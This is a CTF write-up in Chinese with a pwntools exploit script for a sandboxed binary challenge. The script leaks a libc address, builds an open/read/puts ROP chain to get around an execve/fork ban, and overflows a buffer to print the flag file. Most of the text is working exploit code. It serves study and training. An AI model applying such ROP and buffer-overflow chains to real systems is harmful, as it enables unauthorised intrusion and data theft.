利用思路
沙盒禁止了 execve 和 fork syscall，所以不能开启子进程，需要在当前进程里读入 flag 并输出，即利用 orw（open/read/write）链打印 flag。
exp 脚本
# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
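# Exploit script from the writeup. The escaped quotes (\') in the original listing were
# extraction artifacts that made the script a SyntaxError; they are restored to plain quotes
# here, and the pwntools I/O calls use bytes literals so the script runs under Python 2 or 3.
#
# Flow: the challenge leaks puts@libc on a "0x..." line; from that the libc base and the
# gadget/symbol addresses are derived, and an open/read/puts chain is built because the
# sandbox (per the writeup) blocks execve and fork but not file I/O.  For defenders: a seccomp
# policy that only denies execve/fork still leaves open/read/write reachable; an allowlist
# of the syscalls the program actually needs is the usual hardening.
p = remote('node3.buuoj.cn', 29892)
p.recvuntil(b"0x")
puts_addr = int(p.recv(12), 16)  # 12 hex digits of the leaked puts address
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
libcbase_addr = puts_addr - libc.symbols['puts']
# Gadget offsets are hard-coded for the libc build above; any other libc needs them re-derived.
# mov_rdi_rsi_ret = libcbase_addr + libc.search(asm("mov rdi,r13\nret")).next()  # unused; Python 2 .next()
pop_rdi_ret = libcbase_addr + 0x21102
pop_rsi_ret = libcbase_addr + 0x202e8
pop_rdx_ret = libcbase_addr + 0x1b92
open_addr = libcbase_addr + libc.symbols['open']
# __free_hook is used only as a known writable libc address: scratch space for the
# filename and, later, the file contents.
free_hook = libcbase_addr + libc.symbols['__free_hook']
read_addr = libcbase_addr + libc.symbols['read']
puts_addr = libcbase_addr + libc.symbols['puts']  # same value as the leak; recomputed from the base
# Stage 1: read(?, free_hook, 4) -- stores the 4-byte filename sent at the end into free_hook.
# The leading p64(0) is presumably popped into rdi by the pop_rdi_ret gadget that the
# name overflow returns into (fd 0) -- TODO confirm against the binary.
payload = p64(0) + p64(pop_rsi_ret) + p64(free_hook) + p64(pop_rdx_ret) + p64(4) + p64(read_addr)
# Stage 2: open(free_hook, 4)
payload += p64(pop_rdi_ret) + p64(free_hook) + p64(pop_rsi_ret) + p64(4) + p64(open_addr)
# Stage 3: read(3, free_hook, 0x30) -- assumes the opened file gets fd 3 (lowest free fd
# after stdin/stdout/stderr); verify if the target holds other descriptors open.
payload += p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret) + p64(free_hook) + p64(pop_rdx_ret) + p64(0x30) + p64(read_addr)
# Stage 4: puts(free_hook) -- prints the buffer.
payload += p64(pop_rdi_ret) + p64(free_hook) + p64(puts_addr)
p.sendafter(b"Input something: ", payload)
# 0x78 bytes of padding up to the saved return address, then the pop rdi gadget.
p.sendafter(b"What's your name?", b'a' * 0x78 + p64(pop_rdi_ret))
p.send(b"flag")  # the 4 bytes consumed by the stage-1 read()
p.interactive()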